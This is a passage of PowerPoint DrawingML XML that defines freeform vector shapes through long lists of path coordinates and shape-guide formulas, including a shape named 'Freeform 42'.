                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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71" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
